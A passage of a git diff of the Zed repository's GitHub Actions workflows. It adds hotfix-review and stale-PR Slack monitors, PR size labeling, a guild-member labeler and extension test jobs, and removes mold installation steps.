/^R/ { print $2 }' | \ - xargs -I{} basename {} 2>/dev/null | \ - tr '\n' ' ' || echo "") - - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) - - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - env: - PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - MATRIX_REPO: ${{ matrix.repo }} - working-directory: zed - - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files - run: | - mkdir -p extension/.github/workflows cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; then @@ -119,18 +159,18 @@ jobs: cd - > /dev/null if [ "$MATRIX_REPO" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi env: - REMOVED_FILES: ${{ steps.calc-changes.outputs.removed_files }} + REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }} + REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }} MATRIX_REPO: ${{ matrix.repo }} - id: short-sha name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha run: | - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" - working-directory: zed + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - id: create-pr name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request uses: peter-evans/create-pull-request@v7 @@ -140,6 +180,8 @@ jobs: body: | This PR updates the CI workflow files from the main Zed repository based on the commit zed-industries/zed@${{ github.sha }} + + ${{ inputs.change-description }} commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` branch: update-workflows committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> @@ -151,16 +193,17 @@ jobs: - name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge run: | if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi env: GH_TOKEN: ${{ steps.generate-token.outputs.token }} PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }} + working-directory: extension timeout-minutes: 10 create_rollout_tag: needs: - rollout_workflows_to_extension + if: inputs.filter-repos == '' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token diff --git a/.github/workflows/hotfix-review-monitor.yml b/.github/workflows/hotfix-review-monitor.yml new file mode 100644 index 0000000000000000000000000000000000000000..760cd9806c9928d784de1b69ed97c86148ae6fc1 --- /dev/null +++ b/.github/workflows/hotfix-review-monitor.yml @@ -0,0 +1,114 @@ +# Hotfix Review Monitor +# +# Runs daily and checks for merged PRs with the 'hotfix' label that have not +# received a post-merge review approval within one business day. Posts a summary to +# Slack if any are found. This is a SOC2 compensating control for the +# emergency hotfix fast path. +# +# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated +# into shell commands. All PR metadata is read via gh API + jq, not via +# github.event context expressions. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Hotfix Review Monitor + +on: + schedule: + - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-hotfix-reviews: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + steps: + - name: Find unreviewed hotfixes + id: check + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + # 80h lookback covers the Friday-to-Monday gap (72h) with buffer. + # Overlap on weekdays is harmless — reviewed PRs are filtered out below. + SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ) + SINCE_DATE=$(echo "$SINCE" | cut -dT -f1) + + # Use the Search API to find hotfix PRs merged in the lookback window. + # The Pulls API with state=closed paginates through all closed PRs in + # the repo, which times out on large repos. The Search API supports + # merged:>DATE natively so GitHub does the filtering server-side. + gh api --paginate \ + "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \ + --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \ + > /tmp/hotfix_prs.json + + # Check each hotfix PR for a post-merge approving review + jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json + fi + done | jq -s '.' > /tmp/unreviewed.json + + COUNT=$(jq 'length' /tmp/unreviewed.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.check.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.check.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. Block Kit + # doesn't change this — the same jq pipeline feeds into the blocks + # structure instead of plain text. + PRS=$(jq -r '.[] | "• — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " hotfix PR(s) still need post-merge review"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "Hotfix PRs require review within one business day of merge." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr-size-check.yml b/.github/workflows/pr-size-check.yml new file mode 100644 index 0000000000000000000000000000000000000000..6cbed314e012c66da16fd016dd9b3cdcf9788149 --- /dev/null +++ b/.github/workflows/pr-size-check.yml @@ -0,0 +1,109 @@ +# PR Size Check — Compute +# +# Calculates PR size and saves the result as an artifact. A companion +# workflow (pr-size-label.yml) picks up the artifact via workflow_run +# and applies labels + comments with write permissions. +# +# This two-workflow split is required because fork PRs receive a +# read-only GITHUB_TOKEN. The compute step needs no write access; +# the label/comment step runs via workflow_run on the base repo with +# full write permissions. +# +# Security note: This workflow only reads PR file data via the JS API +# and writes a JSON artifact. No untrusted input is interpolated into +# shell commands. + +name: PR Size Check + +on: + pull_request: + types: [opened, synchronize] + +permissions: + contents: read + pull-requests: read + +jobs: + compute-size: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + steps: + - name: Calculate PR size + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + + const { data: files } = await github.rest.pulls.listFiles({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number, + per_page: 300, + }); + + // Sum additions + deletions, excluding generated/lock files + const IGNORED_PATTERNS = [ + /\.lock$/, + /^Cargo\.lock$/, + /pnpm-lock\.yaml$/, + /\.generated\./, + /\/fixtures\//, + /\/snapshots\//, + ]; + + let totalChanges = 0; + for (const file of files) { + const ignored = IGNORED_PATTERNS.some(p => p.test(file.filename)); + if (!ignored) { + totalChanges += file.additions + file.deletions; + } + } + + // Assign size bracket + const SIZE_BRACKETS = [ + ['Size S', 0, 100, '0e8a16'], + ['Size M', 100, 400, 'fbca04'], + ['Size L', 400, 800, 'e99695'], + ['Size XL', 800, Infinity, 'b60205'], + ]; + + let sizeLabel = 'Size S'; + let labelColor = '0e8a16'; + for (const [label, min, max, color] of SIZE_BRACKETS) { + if (totalChanges >= min && totalChanges < max) { + sizeLabel = label; + labelColor = color; + break; + } + } + + // Check if the author wrote content in the "How to Review" section. + const rawBody = context.payload.pull_request.body || ''; + const howToReview = rawBody.match(/## How to Review\s*\n([\s\S]*?)(?=\n## |$)/i); + const hasReviewGuidance = howToReview + ? howToReview[1].replace(//g, '').trim().length > 0 + : false; + + const result = { + pr_number: context.issue.number, + total_changes: totalChanges, + size_label: sizeLabel, + label_color: labelColor, + has_review_guidance: hasReviewGuidance, + }; + + console.log(`PR #${result.pr_number}: ${totalChanges} LOC, ${sizeLabel}`); + + fs.mkdirSync('pr-size', { recursive: true }); + fs.writeFileSync('pr-size/result.json', JSON.stringify(result)); + + - name: Upload size result + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2 + with: + name: pr-size-result + path: pr-size/ + retention-days: 1 +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr-size-label.yml b/.github/workflows/pr-size-label.yml new file mode 100644 index 0000000000000000000000000000000000000000..599daf122aac728c469acd45da865e1079c07fb6 --- /dev/null +++ b/.github/workflows/pr-size-label.yml @@ -0,0 +1,195 @@ +# PR Size Check — Label & Comment +# +# Triggered by workflow_run after pr-size-check.yml completes. +# Downloads the size result artifact and applies labels + comments. +# +# This runs on the base repo with full GITHUB_TOKEN write access, +# so it works for both same-repo and fork PRs. +# +# Security note: The artifact is treated as untrusted data — only +# structured JSON fields (PR number, size label, color, boolean) are +# read. No artifact content is executed or interpolated into shell. + +name: PR Size Label + +on: + workflow_run: + workflows: ["PR Size Check"] + types: [completed] + +jobs: + apply-labels: + if: > + github.repository_owner == 'zed-industries' && + github.event.workflow_run.conclusion == 'success' + permissions: + contents: read + pull-requests: write + issues: write + runs-on: ubuntu-latest + timeout-minutes: 5 + steps: + - name: Download size result artifact + id: download + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + const path = require('path'); + + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + const match = allArtifacts.data.artifacts.find(a => a.name === 'pr-size-result'); + if (!match) { + console.log('No pr-size-result artifact found, skipping'); + core.setOutput('found', 'false'); + return; + } + + const download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: match.id, + archive_format: 'zip', + }); + + const temp = path.join(process.env.RUNNER_TEMP, 'pr-size'); + fs.mkdirSync(temp, { recursive: true }); + fs.writeFileSync(path.join(temp, 'result.zip'), Buffer.from(download.data)); + core.setOutput('found', 'true'); + + - name: Unzip artifact + if: steps.download.outputs.found == 'true' + env: + ARTIFACT_DIR: ${{ runner.temp }}/pr-size + run: unzip "$ARTIFACT_DIR/result.zip" -d "$ARTIFACT_DIR" + + - name: Apply labels and comment + if: steps.download.outputs.found == 'true' + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + const path = require('path'); + + const temp = path.join(process.env.RUNNER_TEMP, 'pr-size'); + const resultPath = path.join(temp, 'result.json'); + if (!fs.existsSync(resultPath)) { + console.log('No result.json found, skipping'); + return; + } + + const result = JSON.parse(fs.readFileSync(resultPath, 'utf8')); + + // Validate artifact data (treat as untrusted) + const prNumber = Number(result.pr_number); + const totalChanges = Number(result.total_changes); + const sizeLabel = String(result.size_label); + const labelColor = String(result.label_color); + const hasReviewGuidance = Boolean(result.has_review_guidance); + + if (!prNumber || !sizeLabel.startsWith('Size ')) { + core.setFailed(`Invalid artifact data: pr=${prNumber}, label=${sizeLabel}`); + return; + } + + console.log(`PR #${prNumber}: ${totalChanges} LOC, ${sizeLabel}`); + + // --- Size label (idempotent) --- + const existingLabels = (await github.rest.issues.listLabelsOnIssue({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + })).data.map(l => l.name); + + const existingSizeLabels = existingLabels.filter(l => l.startsWith('Size ')); + const alreadyCorrect = existingSizeLabels.length === 1 && existingSizeLabels[0] === sizeLabel; + + if (!alreadyCorrect) { + for (const label of existingSizeLabels) { + await github.rest.issues.removeLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + name: label, + }); + } + + try { + await github.rest.issues.createLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + name: sizeLabel, + color: labelColor, + }); + } catch (e) { + if (e.status !== 422) throw e; + } + + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + labels: [sizeLabel], + }); + } + + // --- Large PR handling (400+ LOC) --- + if (totalChanges >= 400) { + if (!existingLabels.includes('large-pr')) { + try { + await github.rest.issues.createLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + name: 'large-pr', + color: 'e99695', + }); + } catch (e) { + if (e.status !== 422) throw e; + } + + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + labels: ['large-pr'], + }); + } + + // Comment once with guidance + const MARKER = ''; + const { data: comments } = await github.rest.issues.listComments({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + }); + + const alreadyCommented = comments.some(c => c.body.includes(MARKER)); + if (!alreadyCommented) { + let body = `${MARKER}\n`; + body += `### :straight_ruler: PR Size: **${totalChanges} lines changed** (${sizeLabel})\n\n`; + body += `Please note: this PR exceeds the 400 LOC soft limit.\n`; + body += `- Consider **splitting** into separate PRs if the changes are separable\n`; + body += `- Ensure the PR description includes a **guided tour** in the "How to Review" section so reviewers know where to start\n`; + + if (hasReviewGuidance) { + body += `\n:white_check_mark: "How to Review" section appears to include guidance — thank you!\n`; + } + + await github.rest.issues.createComment({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + body: body, + }); + } + } + + console.log(`PR #${prNumber}: labeled ${sizeLabel}, done`); +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr_labeler.yml b/.github/workflows/pr_labeler.yml index cc9c4a9eefd4aa75ba69fb18b353efa6a32778c5..4a1f9c474c6d00bec137bbfb58ba78acb15440d1 100644 --- a/.github/workflows/pr_labeler.yml +++ b/.github/workflows/pr_labeler.yml @@ -1,5 +1,6 @@ # Labels pull requests by author: 'bot' for bot accounts, 'staff' for -# staff team members, 'first contribution' for first-time external contributors. +# staff team members, 'guild' for guild members, 'first contribution' for +# first-time external contributors. name: PR Labeler on: @@ -29,8 +30,50 @@ jobs: script: | const BOT_LABEL = 'bot'; const STAFF_LABEL = 'staff'; + const GUILD_LABEL = 'guild'; const FIRST_CONTRIBUTION_LABEL = 'first contribution'; const STAFF_TEAM_SLUG = 'staff'; + const GUILD_MEMBERS = [ + '11happy', + 'AidanV', + 'AmaanBilwar', + 'OmChillure', + 'Palanikannan1437', + 'Shivansh-25', + 'SkandaBhat', + 'TwistingTwists', + 'YEDASAVG', + 'Ziqi-Yang', + 'alanpjohn', + 'arjunkomath', + 'austincummings', + 'ayushk-1801', + 'claiwe', + 'criticic', + 'dongdong867', + 'emamulandalib', + 'eureka928', + 'feitreim', + 'iam-liam', + 'iksuddle', + 'ishaksebsib', + 'lingyaochu', + 'loadingalias', + 'marcocondrache', + 'mchisolm0', + 'mostlyKIGuess', + 'nairadithya', + 'nihalxkumar', + 'notJoon', + 'polyesterswing', + 'prayanshchh', + 'razeghi71', + 'sarmadgulzar', + 'seanstrom', + 'th0jensen', + 'tommyming', + 'virajbhartiya', + ]; const pr = context.payload.pull_request; const author = pr.user.login; @@ -71,6 +114,17 @@ jobs: return; } + if (GUILD_MEMBERS.includes(author)) { + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: pr.number, + labels: [GUILD_LABEL] + }); + console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`); + // No early return: guild members can also get 'first contribution' + } + // We use inverted logic here due to a suspected GitHub bug where first-time contributors // get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'. // https://github.com/orgs/community/discussions/78038 diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 8adad5cfba278dc68dd227b86455510278c7a1ae..07a0a6d672a0a66c9c1609e82a22af9034dc936e 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -72,8 +72,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -199,8 +197,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -318,8 +314,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -360,8 +354,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/release_nightly.yml b/.github/workflows/release_nightly.yml index 46d8732b08ea658275e1fb21117a09b9e0668933..093a17e8760e52fc4278d56dd6144b6a0432f3c5 100644 --- a/.github/workflows/release_nightly.yml +++ b/.github/workflows/release_nightly.yml @@ -122,8 +122,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -170,8 +168,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/run_agent_evals.yml b/.github/workflows/run_agent_evals.yml index c506039ce7c1863bd3c60091beb78d5239110bbd..56cbd17a197200a6764ed1e28c87e90740cd7deb 100644 --- a/.github/workflows/run_agent_evals.yml +++ b/.github/workflows/run_agent_evals.yml @@ -34,8 +34,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config diff --git a/.github/workflows/run_bundling.yml b/.github/workflows/run_bundling.yml index 7cb1665f9d0bd4fe3b0f3c05527bf39aab5f610a..5a93cf074e2a2d7f2f3cf8418ed508c5ad359d9e 100644 --- a/.github/workflows/run_bundling.yml +++ b/.github/workflows/run_bundling.yml @@ -32,8 +32,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -73,8 +71,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/run_cron_unit_evals.yml b/.github/workflows/run_cron_unit_evals.yml index 2a204a9d40d78bf52f38825b4db060216e348a87..6af46e678d3d629cc2f7973b8b31ee99477dfefc 100644 --- a/.github/workflows/run_cron_unit_evals.yml +++ b/.github/workflows/run_cron_unit_evals.yml @@ -35,8 +35,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 00d69639a53868386157e67aeab5ce7383d32426..1906acf9fab7bbaab81b0549328c2e85d732756d 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -103,13 +103,22 @@ jobs: check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP - check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP + check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT" outputs: changed_packages: ${{ steps.filter.outputs.changed_packages }} run_action_checks: ${{ steps.filter.outputs.run_action_checks }} run_docs: ${{ steps.filter.outputs.run_docs }} run_licenses: ${{ steps.filter.outputs.run_licenses }} run_tests: ${{ steps.filter.outputs.run_tests }} + changed_extensions: ${{ steps.filter.outputs.changed_extensions }} check_style: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-4x8-ubuntu-2204 @@ -147,8 +156,8 @@ jobs: file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - name: run_tests::run_ts_query_ls run: |- - tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - ./ts_query_ls format --check . || { + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { echo "Found unformatted queries, please format them with ts_query_ls." echo "For easy use, install the Tree-sitter query extension:" echo "zed://extension/tree-sitter-query" @@ -209,8 +218,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -256,6 +263,39 @@ jobs: - name: steps::show_sccache_stats run: sccache --show-stats || true timeout-minutes: 60 + clippy_mac_x86_64: + needs: + - orchestrate + if: needs.orchestrate.outputs.run_tests == 'true' + runs-on: namespace-profile-mac-large + steps: + - name: steps::checkout_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup + - name: steps::install_rustup_target + run: rustup target add x86_64-apple-darwin + - name: steps::setup_sccache + run: ./script/setup-sccache + env: + R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} + R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} + R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} + SCCACHE_BUCKET: sccache-zed + - name: steps::clippy + run: ./script/clippy --target x86_64-apple-darwin + - name: steps::show_sccache_stats + run: sccache --show-stats || true + timeout-minutes: 60 run_tests_windows: needs: - orchestrate @@ -322,8 +362,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -421,8 +459,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config @@ -471,8 +507,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -597,8 +631,6 @@ jobs: jobSummary: false - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/generate-action-metadata @@ -711,6 +743,20 @@ jobs: - name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting run: buf format --diff --exit-code crates/proto/proto timeout-minutes: 60 + extension_tests: + needs: + - orchestrate + if: needs.orchestrate.outputs.changed_extensions != '[]' + permissions: + contents: read + strategy: + matrix: + extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_tests.yml + with: + working-directory: ${{ matrix.extension }} tests_pass: needs: - orchestrate @@ -718,6 +764,7 @@ jobs: - clippy_windows - clippy_linux - clippy_mac + - clippy_mac_x86_64 - run_tests_windows - run_tests_linux - run_tests_mac @@ -728,6 +775,7 @@ jobs: - check_docs - check_licenses - check_scripts + - extension_tests if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always() runs-on: namespace-profile-2x4-ubuntu-2404 steps: @@ -746,6 +794,7 @@ jobs: check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS" check_result "clippy_linux" "$RESULT_CLIPPY_LINUX" check_result "clippy_mac" "$RESULT_CLIPPY_MAC" + check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64" check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS" check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX" check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC" @@ -756,6 +805,7 @@ jobs: check_result "check_docs" "$RESULT_CHECK_DOCS" check_result "check_licenses" "$RESULT_CHECK_LICENSES" check_result "check_scripts" "$RESULT_CHECK_SCRIPTS" + check_result "extension_tests" "$RESULT_EXTENSION_TESTS" exit $EXIT_CODE env: @@ -764,6 +814,7 @@ jobs: RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }} RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} @@ -774,6 +825,7 @@ jobs: RESULT_CHECK_DOCS: ${{ needs.check_docs.result }} RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }} RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }} + RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/run_unit_evals.yml b/.github/workflows/run_unit_evals.yml index 2259d2498b76f3627e6784f55023e2fbfe855cbb..44f12a1886bdac2fa1da8c870d223dd358285658 100644 --- a/.github/workflows/run_unit_evals.yml +++ b/.github/workflows/run_unit_evals.yml @@ -38,8 +38,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git a/.github/workflows/stale-pr-reminder.yml b/.github/workflows/stale-pr-reminder.yml new file mode 100644 index 0000000000000000000000000000000000000000..1c3c0aec623c68c3c99803ef2421e73dbec9cf8e --- /dev/null +++ b/.github/workflows/stale-pr-reminder.yml @@ -0,0 +1,115 @@ +# Stale PR Review Reminder +# +# Runs daily on weekdays (second run at 8 PM UTC disabled during rollout) and posts a Slack summary of open PRs that +# have been awaiting review for more than 72 hours. Team-level signal only — +# no individual shaming. +# +# Security note: No untrusted input is interpolated into shell commands. +# All PR metadata is read via gh API + jq. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Stale PR Review Reminder + +on: + schedule: + - cron: "0 14 * * 1-5" # 2 PM UTC weekdays + # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-stale-prs: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + # Only surface PRs created on or after this date. Update this if the + # review process enforcement date changes. + PROCESS_START_DATE: "2026-03-19T00:00:00Z" + steps: + - name: Find PRs awaiting review longer than 72h + id: stale + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ) + + # Get open, non-draft PRs with pending review requests, created before cutoff + # but after the review process start date (to exclude pre-existing backlog) + gh api --paginate \ + 